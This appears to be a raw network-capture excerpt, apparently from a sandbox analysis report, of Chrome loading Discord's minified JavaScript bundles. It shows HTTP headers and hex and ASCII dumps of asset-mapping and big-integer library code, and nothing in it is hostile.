                                                                                                                                                                                                                                                                                    2024-11-23 20:12:14 UTC406INData Raw: 28 28 29 3d 3e 7b 76 61 72 20 65 3d 7b 35 39 35 31 37 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 7b 22 2e 2f 32 30 31 37 2d 31 31 2d 31 36 2e 6d 70 34 22 3a 22 32 32 31 38 32 35 22 2c 22 2e 2f 63 68 61 6e 6e 65 6c 2d 66 6f 6c 6c 6f 77 69 6e 67 2e 70 6e 67 22 3a 22 32 34 37 38 31 35 22 2c 22 2e 2f 64 69 73 63 6f 76 65 72 79 2e 6a 70 67 22 3a 22 37 37 38 36 30 38 22 2c 22 2e 2f 67 32 35 30 6b 2d 63 6c 2e 6d 70 34 22 3a 22 39 30 39 38 35 31 22 2c 22 2e 2f 68 79 70 65 73 71 75 61 64 2d 68 61 63 6b 2d 77 65 65 6b 2f 68 65 61 64 65 72 2e 70 6e 67 22 3a 22 38 31 39 30 39 31 22 2c 22 2e 2f 68 79 70 65 73 71 75 61 64 2d 68 61 63 6b 2d 77 65 65 6b 2f 70 61 6c 61 64 69 6e 73 2d 6c 6f 6f 74 2e 70 6e 67 22 3a 22 37 34 32 33 30 35 22 2c 22
                                                                                                                                                                                                                                                                                    Data Ascii: (()=>{var e={595173:function(e,t,n){var r={"./2017-11-16.mp4":"221825","./channel-following.png":"247815","./discovery.jpg":"778608","./g250k-cl.mp4":"909851","./hypesquad-hack-week/header.png":"819091","./hypesquad-hack-week/paladins-loot.png":"742305","
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:14 UTC1369INData Raw: 2e 2f 73 74 69 63 6b 65 72 73 2d 6c 61 75 6e 63 68 2f 32 30 32 30 5f 50 4d 4d 5f 53 54 49 43 4b 45 52 53 5f 4d 72 6b 74 5f 42 6c 6f 67 48 64 72 5f 32 35 30 30 78 31 30 30 30 2e 70 6e 67 22 3a 22 39 32 38 34 30 30 22 2c 22 2e 2f 73 74 69 63 6b 65 72 73 2d 6c 61 75 6e 63 68 2f 32 30 32 30 5f 50 4d 4d 5f 53 54 49 43 4b 45 52 53 5f 4d 72 6b 74 5f 44 65 73 6b 74 6f 70 48 65 72 6f 5f 4c 65 66 74 5f 31 38 30 78 32 32 30 2e 70 6e 67 22 3a 22 31 34 38 38 32 31 22 2c 22 2e 2f 73 74 69 63 6b 65 72 73 2d 6c 61 75 6e 63 68 2f 32 30 32 30 5f 50 4d 4d 5f 53 54 49 43 4b 45 52 53 5f 4d 72 6b 74 5f 44 65 73 6b 74 6f 70 48 65 72 6f 5f 52 69 67 68 74 5f 31 38 30 78 32 32 30 2e 70 6e 67 22 3a 22 39 38 32 35 36 33 22 2c 22 2e 2f 73 74 69 63 6b 65 72 73 2d 6c 61 75 6e 63 68 2f
                                                                                                                                                                                                                                                                                    Data Ascii: ./stickers-launch/2020_PMM_STICKERS_Mrkt_BlogHdr_2500x1000.png":"928400","./stickers-launch/2020_PMM_STICKERS_Mrkt_DesktopHero_Left_180x220.png":"148821","./stickers-launch/2020_PMM_STICKERS_Mrkt_DesktopHero_Right_180x220.png":"982563","./stickers-launch/
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:14 UTC1369INData Raw: 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 66 69 6e 64 20 6d 6f 64 75 6c 65 20 27 22 2b 65 2b 22 27 22 29 3b 74 68 72 6f 77 20 74 2e 63 6f 64 65 3d 22 4d 4f 44 55 4c 45 5f 4e 4f 54 5f 46 4f 55 4e 44 22 2c 74 7d 72 65 74 75 72 6e 20 72 5b 65 5d 7d 69 2e 6b 65 79 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 6b 65 79 73 28 72 29 7d 2c 69 2e 72 65 73 6f 6c 76 65 3d 61 2c 65 2e 65 78 70 6f 72 74 73 3d 69 2c 69 2e 69 64 3d 22 31 34 38 36 36 30 22 7d 2c 35 37 37 33 39 31 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 7b 22 2e 2f 69 6d 67 5f 70 72 65 6d 69 75 6d 5f 65 6d 6f 6a 69 5f 64 61 72 6b 2e 73 76 67 22 3a 22 33 34 31 30 34 38 22 2c 22 2e 2f 69 6d 67 5f 70 72 65 6d 69 75 6d 5f 65 6d 6f 6a 69 5f 6c 69 67
                                                                                                                                                                                                                                                                                    Data Ascii: rror("Cannot find module '"+e+"'");throw t.code="MODULE_NOT_FOUND",t}return r[e]}i.keys=function(){return Object.keys(r)},i.resolve=a,e.exports=i,i.id="148660"},577391:function(e,t,n){var r={"./img_premium_emoji_dark.svg":"341048","./img_premium_emoji_lig
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:14 UTC1369INData Raw: 65 72 2d 32 32 2e 70 6e 67 22 3a 22 38 39 39 35 36 35 22 7d 3b 66 75 6e 63 74 69 6f 6e 20 69 28 65 29 7b 72 65 74 75 72 6e 20 6e 28 61 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 29 7b 69 66 28 21 6e 2e 6f 28 72 2c 65 29 29 7b 76 61 72 20 74 3d 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 66 69 6e 64 20 6d 6f 64 75 6c 65 20 27 22 2b 65 2b 22 27 22 29 3b 74 68 72 6f 77 20 74 2e 63 6f 64 65 3d 22 4d 4f 44 55 4c 45 5f 4e 4f 54 5f 46 4f 55 4e 44 22 2c 74 7d 72 65 74 75 72 6e 20 72 5b 65 5d 7d 69 2e 6b 65 79 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 6b 65 79 73 28 72 29 7d 2c 69 2e 72 65 73 6f 6c 76 65 3d 61 2c 65 2e 65 78 70 6f 72 74 73 3d 69 2c 69 2e 69 64 3d 22 37 33 35 38 30 30 22 7d 2c 36 30 34 39 30 31 3a 66 75
                                                                                                                                                                                                                                                                                    Data Ascii: er-22.png":"899565"};function i(e){return n(a(e))}function a(e){if(!n.o(r,e)){var t=Error("Cannot find module '"+e+"'");throw t.code="MODULE_NOT_FOUND",t}return r[e]}i.keys=function(){return Object.keys(r)},i.resolve=a,e.exports=i,i.id="735800"},604901:fu
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:14 UTC1369INData Raw: 5f 72 69 6e 67 69 6e 67 2e 6d 70 33 22 3a 22 36 31 32 33 36 33 22 2c 22 2e 2f 68 61 6c 6c 6f 77 65 65 6e 5f 64 65 61 66 65 6e 2e 6d 70 33 22 3a 22 35 37 38 31 34 22 2c 22 2e 2f 68 61 6c 6c 6f 77 65 65 6e 5f 64 65 66 65 61 6e 2e 6d 70 33 22 3a 22 38 31 39 30 39 38 22 2c 22 2e 2f 68 61 6c 6c 6f 77 65 65 6e 5f 64 69 73 63 6f 6e 6e 65 63 74 2e 6d 70 33 22 3a 22 33 38 32 34 37 32 22 2c 22 2e 2f 68 61 6c 6c 6f 77 65 65 6e 5f 6d 65 73 73 61 67 65 31 2e 6d 70 33 22 3a 22 37 37 32 36 33 37 22 2c 22 2e 2f 68 61 6c 6c 6f 77 65 65 6e 5f 6d 75 74 65 2e 6d 70 33 22 3a 22 35 33 39 37 31 36 22 2c 22 2e 2f 68 61 6c 6c 6f 77 65 65 6e 5f 75 6e 64 65 61 66 65 6e 2e 6d 70 33 22 3a 22 32 35 37 31 33 30 22 2c 22 2e 2f 68 61 6c 6c 6f 77 65 65 6e 5f 75 6e 64 65 66 65 61 6e 2e 6d
                                                                                                                                                                                                                                                                                    Data Ascii: _ringing.mp3":"612363","./halloween_deafen.mp3":"57814","./halloween_defean.mp3":"819098","./halloween_disconnect.mp3":"382472","./halloween_message1.mp3":"772637","./halloween_mute.mp3":"539716","./halloween_undeafen.mp3":"257130","./halloween_undefean.m
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:14 UTC1369INData Raw: 6e 20 69 28 65 29 7b 72 65 74 75 72 6e 20 6e 28 61 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 29 7b 69 66 28 21 6e 2e 6f 28 72 2c 65 29 29 7b 76 61 72 20 74 3d 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 66 69 6e 64 20 6d 6f 64 75 6c 65 20 27 22 2b 65 2b 22 27 22 29 3b 74 68 72 6f 77 20 74 2e 63 6f 64 65 3d 22 4d 4f 44 55 4c 45 5f 4e 4f 54 5f 46 4f 55 4e 44 22 2c 74 7d 72 65 74 75 72 6e 20 72 5b 65 5d 7d 69 2e 6b 65 79 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 6b 65 79 73 28 72 29 7d 2c 69 2e 72 65 73 6f 6c 76 65 3d 61 2c 65 2e 65 78 70 6f 72 74 73 3d 69 2c 69 2e 69 64 3d 22 34 35 31 33 34 33 22 7d 2c 36 39 32 34 32 35 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 7b 22 2e 2f 63 68 61 6d
                                                                                                                                                                                                                                                                                    Data Ascii: n i(e){return n(a(e))}function a(e){if(!n.o(r,e)){var t=Error("Cannot find module '"+e+"'");throw t.code="MODULE_NOT_FOUND",t}return r[e]}i.keys=function(){return Object.keys(r)},i.resolve=a,e.exports=i,i.id="451343"},692425:function(e,t,n){var r={"./cham
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:14 UTC1369INData Raw: 22 3a 22 33 31 39 34 39 32 22 2c 22 2e 2f 63 68 61 6d 70 69 6f 6e 5f 31 35 37 2e 6a 70 67 22 3a 22 32 35 36 34 33 37 22 2c 22 2e 2f 63 68 61 6d 70 69 6f 6e 5f 31 36 2e 6a 70 67 22 3a 22 34 32 30 34 35 36 22 2c 22 2e 2f 63 68 61 6d 70 69 6f 6e 5f 31 36 31 2e 6a 70 67 22 3a 22 31 32 33 34 37 35 22 2c 22 2e 2f 63 68 61 6d 70 69 6f 6e 5f 31 36 33 2e 6a 70 67 22 3a 22 32 38 36 30 37 33 22 2c 22 2e 2f 63 68 61 6d 70 69 6f 6e 5f 31 36 34 2e 6a 70 67 22 3a 22 37 38 30 36 38 32 22 2c 22 2e 2f 63 68 61 6d 70 69 6f 6e 5f 31 36 36 2e 6a 70 67 22 3a 22 37 39 34 30 38 34 22 2c 22 2e 2f 63 68 61 6d 70 69 6f 6e 5f 31 37 2e 6a 70 67 22 3a 22 36 37 30 33 34 34 22 2c 22 2e 2f 63 68 61 6d 70 69 6f 6e 5f 31 38 2e 6a 70 67 22 3a 22 32 39 31 33 31 37 22 2c 22 2e 2f 63 68 61 6d
                                                                                                                                                                                                                                                                                    Data Ascii: ":"319492","./champion_157.jpg":"256437","./champion_16.jpg":"420456","./champion_161.jpg":"123475","./champion_163.jpg":"286073","./champion_164.jpg":"780682","./champion_166.jpg":"794084","./champion_17.jpg":"670344","./champion_18.jpg":"291317","./cham
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:14 UTC1369INData Raw: 6d 70 69 6f 6e 5f 33 35 30 2e 6a 70 67 22 3a 22 31 33 38 31 34 31 22 2c 22 2e 2f 63 68 61 6d 70 69 6f 6e 5f 33 36 2e 6a 70 67 22 3a 22 31 37 34 38 37 35 22 2c 22 2e 2f 63 68 61 6d 70 69 6f 6e 5f 33 36 30 2e 6a 70 67 22 3a 22 36 31 36 37 36 35 22 2c 22 2e 2f 63 68 61 6d 70 69 6f 6e 5f 33 37 2e 6a 70 67 22 3a 22 31 33 34 36 37 32 22 2c 22 2e 2f 63 68 61 6d 70 69 6f 6e 5f 33 38 2e 6a 70 67 22 3a 22 31 32 34 30 39 34 22 2c 22 2e 2f 63 68 61 6d 70 69 6f 6e 5f 33 39 2e 6a 70 67 22 3a 22 31 37 35 38 39 33 22 2c 22 2e 2f 63 68 61 6d 70 69 6f 6e 5f 34 2e 6a 70 67 22 3a 22 37 30 30 35 36 32 22 2c 22 2e 2f 63 68 61 6d 70 69 6f 6e 5f 34 30 2e 6a 70 67 22 3a 22 32 36 31 37 32 22 2c 22 2e 2f 63 68 61 6d 70 69 6f 6e 5f 34 31 2e 6a 70 67 22 3a 22 32 36 39 31 37 37 22 2c
                                                                                                                                                                                                                                                                                    Data Ascii: mpion_350.jpg":"138141","./champion_36.jpg":"174875","./champion_360.jpg":"616765","./champion_37.jpg":"134672","./champion_38.jpg":"124094","./champion_39.jpg":"175893","./champion_4.jpg":"700562","./champion_40.jpg":"26172","./champion_41.jpg":"269177",
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:14 UTC1369INData Raw: 63 68 61 6d 70 69 6f 6e 5f 37 2e 6a 70 67 22 3a 22 34 32 36 35 33 36 22 2c 22 2e 2f 63 68 61 6d 70 69 6f 6e 5f 37 31 31 2e 6a 70 67 22 3a 22 31 31 37 36 38 22 2c 22 2e 2f 63 68 61 6d 70 69 6f 6e 5f 37 32 2e 6a 70 67 22 3a 22 34 31 32 34 36 31 22 2c 22 2e 2f 63 68 61 6d 70 69 6f 6e 5f 37 34 2e 6a 70 67 22 3a 22 38 35 30 37 37 22 2c 22 2e 2f 63 68 61 6d 70 69 6f 6e 5f 37 35 2e 6a 70 67 22 3a 22 36 32 30 36 35 33 22 2c 22 2e 2f 63 68 61 6d 70 69 6f 6e 5f 37 36 2e 6a 70 67 22 3a 22 33 39 39 38 38 34 22 2c 22 2e 2f 63 68 61 6d 70 69 6f 6e 5f 37 37 2e 6a 70 67 22 3a 22 33 35 33 30 32 36 22 2c 22 2e 2f 63 68 61 6d 70 69 6f 6e 5f 37 37 37 2e 6a 70 67 22 3a 22 32 32 33 34 32 33 22 2c 22 2e 2f 63 68 61 6d 70 69 6f 6e 5f 37 38 2e 6a 70 67 22 3a 22 39 38 36 33 34 36
                                                                                                                                                                                                                                                                                    Data Ascii: champion_7.jpg":"426536","./champion_711.jpg":"11768","./champion_72.jpg":"412461","./champion_74.jpg":"85077","./champion_75.jpg":"620653","./champion_76.jpg":"399884","./champion_77.jpg":"353026","./champion_777.jpg":"223423","./champion_78.jpg":"986346
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:14 UTC1369INData Raw: 6f 6e 5f 31 30 2e 6a 70 67 22 3a 22 34 31 34 30 34 22 2c 22 2e 2f 63 68 61 6d 70 69 6f 6e 5f 31 30 31 2e 6a 70 67 22 3a 22 39 38 35 39 36 36 22 2c 22 2e 2f 63 68 61 6d 70 69 6f 6e 5f 31 30 32 2e 6a 70 67 22 3a 22 36 39 33 32 34 37 22 2c 22 2e 2f 63 68 61 6d 70 69 6f 6e 5f 31 30 33 2e 6a 70 67 22 3a 22 39 39 32 30 32 30 22 2c 22 2e 2f 63 68 61 6d 70 69 6f 6e 5f 31 30 34 2e 6a 70 67 22 3a 22 33 36 38 32 33 38 22 2c 22 2e 2f 63 68 61 6d 70 69 6f 6e 5f 31 30 35 2e 6a 70 67 22 3a 22 32 37 37 38 38 36 22 2c 22 2e 2f 63 68 61 6d 70 69 6f 6e 5f 31 30 36 2e 6a 70 67 22 3a 22 38 39 36 32 35 34 22 2c 22 2e 2f 63 68 61 6d 70 69 6f 6e 5f 31 30 37 2e 6a 70 67 22 3a 22 32 32 37 34 33 34 22 2c 22 2e 2f 63 68 61 6d 70 69 6f 6e 5f 31 31 2e 6a 70 67 22 3a 22 31 39 38 31 34
                                                                                                                                                                                                                                                                                    Data Ascii: on_10.jpg":"41404","./champion_101.jpg":"985966","./champion_102.jpg":"693247","./champion_103.jpg":"992020","./champion_104.jpg":"368238","./champion_105.jpg":"277886","./champion_106.jpg":"896254","./champion_107.jpg":"227434","./champion_11.jpg":"19814


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    6192.168.2.549719162.159.137.2324437288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:13 UTC869OUTGET /assets/sentry.0a75547723fa3698c125.js HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: discord.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                    Referer: https://discord.com/invite/BNXa5rYFXM
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                    Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:14 UTC964INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:14 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                                                    Content-Length: 1119213
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    CF-Ray: 8e73d01bcbd0439c-EWR
                                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://discord.com
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                    ETag: "90185744d23c5063dc7fb2f3e6ef0ecd"
                                                                                                                                                                                                                                                                                    Last-Modified: Sat, 23 Nov 2024 00:20:15 GMT
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                    Permissions-Policy: interest-cohort=()
                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C0HOFh558Ti78YtOcItjRq8T%2FInrOJlEtklAflndz8LQ%2FgDAd7WRs%2BMbL1hcfk9upYx2vgEdi1N7FAMft9b9zQ9FJIbyPchJ7G3A8gcqLqdBUmftJJ1vX80Z2B98"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:14 UTC405INData Raw: 28 28 29 3d 3e 7b 76 61 72 20 65 3d 7b 36 35 34 38 36 31 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 65 3d 72 2e 6e 6d 64 28 65 29 3b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 74 3d 73 28 39 30 30 37 31 39 39 32 35 34 37 34 30 39 39 32 29 2c 72 3d 22 30 31 32 33 34 35 36 37 38 39 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 22 2c 61 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 42 69 67 49 6e 74 3b 66 75 6e 63 74 69 6f 6e 20 5f 28 65 2c 74 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 3d 3d 3d 65 3f 5f 5b 30 5d 3a 76 6f 69 64 20 30 21 3d 3d 74 3f 31 30 21 3d 2b 74 7c 7c 72 3f 78 28 65 2c 74 2c 72 2c 6e 29 3a 46 28 65 29 3a 46 28
                                                                                                                                                                                                                                                                                    Data Ascii: (()=>{var e={654861:function(e,t,r){e=r.nmd(e);var n=function(e){"use strict";var t=s(9007199254740992),r="0123456789abcdefghijklmnopqrstuvwxyz",a="function"==typeof BigInt;function _(e,t,r,n){return void 0===e?_[0]:void 0!==t?10!=+t||r?x(e,t,r,n):F(e):F(
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:14 UTC1369INData Raw: 6f 6e 20 63 28 65 29 7b 72 65 74 75 72 6e 20 2d 39 30 30 37 31 39 39 32 35 34 37 34 30 39 39 32 3c 65 26 26 65 3c 39 30 30 37 31 39 39 32 35 34 37 34 30 39 39 32 7d 66 75 6e 63 74 69 6f 6e 20 73 28 65 29 7b 72 65 74 75 72 6e 20 65 3c 31 65 37 3f 5b 65 5d 3a 65 3c 31 65 31 34 3f 5b 65 25 31 65 37 2c 4d 61 74 68 2e 66 6c 6f 6f 72 28 65 2f 31 65 37 29 5d 3a 5b 65 25 31 65 37 2c 4d 61 74 68 2e 66 6c 6f 6f 72 28 65 2f 31 65 37 29 25 31 65 37 2c 4d 61 74 68 2e 66 6c 6f 6f 72 28 65 2f 31 65 31 34 29 5d 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 65 29 7b 75 28 65 29 3b 76 61 72 20 72 3d 65 2e 6c 65 6e 67 74 68 3b 69 66 28 72 3c 34 26 26 30 3e 67 28 65 2c 74 29 29 73 77 69 74 63 68 28 72 29 7b 63 61 73 65 20 30 3a 72 65 74 75 72 6e 20 30 3b 63 61 73 65 20 31 3a 72 65 74
                                                                                                                                                                                                                                                                                    Data Ascii: on c(e){return -9007199254740992<e&&e<9007199254740992}function s(e){return e<1e7?[e]:e<1e14?[e%1e7,Math.floor(e/1e7)]:[e%1e7,Math.floor(e/1e7)%1e7,Math.floor(e/1e14)]}function l(e){u(e);var r=e.length;if(r<4&&0>g(e,t))switch(r){case 0:return 0;case 1:ret
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:14 UTC1369INData Raw: 61 6c 75 65 2c 6e 3d 74 2e 76 61 6c 75 65 3b 72 65 74 75 72 6e 20 74 2e 69 73 53 6d 61 6c 6c 3f 6e 65 77 20 6f 28 54 28 72 2c 4d 61 74 68 2e 61 62 73 28 6e 29 29 2c 74 68 69 73 2e 73 69 67 6e 29 3a 6e 65 77 20 6f 28 41 28 72 2c 6e 29 2c 74 68 69 73 2e 73 69 67 6e 29 7d 2c 6f 2e 70 72 6f 74 6f 74 79 70 65 2e 70 6c 75 73 3d 6f 2e 70 72 6f 74 6f 74 79 70 65 2e 61 64 64 2c 69 2e 70 72 6f 74 6f 74 79 70 65 2e 61 64 64 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 46 28 65 29 2c 72 3d 74 68 69 73 2e 76 61 6c 75 65 3b 69 66 28 72 3c 30 21 3d 3d 74 2e 73 69 67 6e 29 72 65 74 75 72 6e 20 74 68 69 73 2e 73 75 62 74 72 61 63 74 28 74 2e 6e 65 67 61 74 65 28 29 29 3b 76 61 72 20 6e 3d 74 2e 76 61 6c 75 65 3b 69 66 28 74 2e 69 73 53 6d 61 6c 6c 29 7b 69 66
                                                                                                                                                                                                                                                                                    Data Ascii: alue,n=t.value;return t.isSmall?new o(T(r,Math.abs(n)),this.sign):new o(A(r,n),this.sign)},o.prototype.plus=o.prototype.add,i.prototype.add=function(e){var t=F(e),r=this.value;if(r<0!==t.sign)return this.subtract(t.negate());var n=t.value;if(t.isSmall){if
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:14 UTC1369INData Raw: 69 6e 75 73 3d 6f 2e 70 72 6f 74 6f 74 79 70 65 2e 73 75 62 74 72 61 63 74 2c 69 2e 70 72 6f 74 6f 74 79 70 65 2e 73 75 62 74 72 61 63 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 46 28 65 29 2c 72 3d 74 68 69 73 2e 76 61 6c 75 65 3b 69 66 28 72 3c 30 21 3d 3d 74 2e 73 69 67 6e 29 72 65 74 75 72 6e 20 74 68 69 73 2e 61 64 64 28 74 2e 6e 65 67 61 74 65 28 29 29 3b 76 61 72 20 6e 3d 74 2e 76 61 6c 75 65 3b 72 65 74 75 72 6e 20 74 2e 69 73 53 6d 61 6c 6c 3f 6e 65 77 20 69 28 72 2d 6e 29 3a 66 28 6e 2c 4d 61 74 68 2e 61 62 73 28 72 29 2c 72 3e 3d 30 29 7d 2c 69 2e 70 72 6f 74 6f 74 79 70 65 2e 6d 69 6e 75 73 3d 69 2e 70 72 6f 74 6f 74 79 70 65 2e 73 75 62 74 72 61 63 74 2c 45 2e 70 72 6f 74 6f 74 79 70 65 2e 73 75 62 74 72 61 63 74 3d 66 75 6e
                                                                                                                                                                                                                                                                                    Data Ascii: inus=o.prototype.subtract,i.prototype.subtract=function(e){var t=F(e),r=this.value;if(r<0!==t.sign)return this.add(t.negate());var n=t.value;return t.isSmall?new i(r-n):f(n,Math.abs(r),r>=0)},i.prototype.minus=i.prototype.subtract,E.prototype.subtract=fun
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:14 UTC1369INData Raw: 65 69 6c 28 6e 2f 32 29 3b 76 61 72 20 61 3d 74 2e 73 6c 69 63 65 28 6e 29 2c 5f 3d 74 2e 73 6c 69 63 65 28 30 2c 6e 29 2c 6f 3d 72 2e 73 6c 69 63 65 28 6e 29 2c 69 3d 72 2e 73 6c 69 63 65 28 30 2c 6e 29 2c 45 3d 65 28 5f 2c 69 29 2c 63 3d 65 28 61 2c 6f 29 2c 73 3d 65 28 41 28 5f 2c 61 29 2c 41 28 69 2c 6f 29 29 2c 6c 3d 41 28 41 28 45 2c 70 28 64 28 64 28 73 2c 45 29 2c 63 29 2c 6e 29 29 2c 70 28 63 2c 32 2a 6e 29 29 3b 72 65 74 75 72 6e 20 75 28 6c 29 2c 6c 7d 28 69 2c 45 29 2c 63 29 3a 6e 65 77 20 6f 28 4c 28 69 2c 45 29 2c 63 29 7d 2c 6f 2e 70 72 6f 74 6f 74 79 70 65 2e 74 69 6d 65 73 3d 6f 2e 70 72 6f 74 6f 74 79 70 65 2e 6d 75 6c 74 69 70 6c 79 2c 69 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 6d 75 6c 74 69 70 6c 79 42 79 53 6d 61 6c 6c 3d 66 75 6e 63 74
                                                                                                                                                                                                                                                                                    Data Ascii: eil(n/2);var a=t.slice(n),_=t.slice(0,n),o=r.slice(n),i=r.slice(0,n),E=e(_,i),c=e(a,o),s=e(A(_,a),A(i,o)),l=A(A(E,p(d(d(s,E),c),n)),p(c,2*n));return u(l),l}(i,E),c):new o(L(i,E),c)},o.prototype.times=o.prototype.multiply,i.prototype._multiplyBySmall=funct
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:14 UTC1369INData Raw: 69 66 28 31 3d 3d 3d 41 29 72 65 74 75 72 6e 5b 65 2c 5f 5b 30 5d 5d 3b 69 66 28 2d 31 3d 3d 41 29 72 65 74 75 72 6e 5b 65 2e 6e 65 67 61 74 65 28 29 2c 5f 5b 30 5d 5d 3b 76 61 72 20 54 3d 4d 61 74 68 2e 61 62 73 28 41 29 3b 69 66 28 54 3c 31 65 37 29 7b 72 3d 6c 28 28 6e 3d 44 28 4e 2c 54 29 29 5b 30 5d 29 3b 76 61 72 20 66 3d 6e 5b 31 5d 3b 72 65 74 75 72 6e 28 65 2e 73 69 67 6e 26 26 28 66 3d 2d 66 29 2c 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 72 29 3f 28 65 2e 73 69 67 6e 21 3d 3d 63 2e 73 69 67 6e 26 26 28 72 3d 2d 72 29 2c 5b 6e 65 77 20 69 28 72 29 2c 6e 65 77 20 69 28 66 29 5d 29 3a 5b 6e 65 77 20 6f 28 72 2c 65 2e 73 69 67 6e 21 3d 3d 63 2e 73 69 67 6e 29 2c 6e 65 77 20 69 28 66 29 5d 7d 41 3d 73 28 54 29 7d 76 61 72 20 4c 3d 67 28 4e
                                                                                                                                                                                                                                                                                    Data Ascii: if(1===A)return[e,_[0]];if(-1==A)return[e.negate(),_[0]];var T=Math.abs(A);if(T<1e7){r=l((n=D(N,T))[0]);var f=n[1];return(e.sign&&(f=-f),"number"==typeof r)?(e.sign!==c.sign&&(r=-r),[new i(r),new i(f)]):[new o(r,e.sign!==c.sign),new i(f)]}A=s(T)}var L=g(N
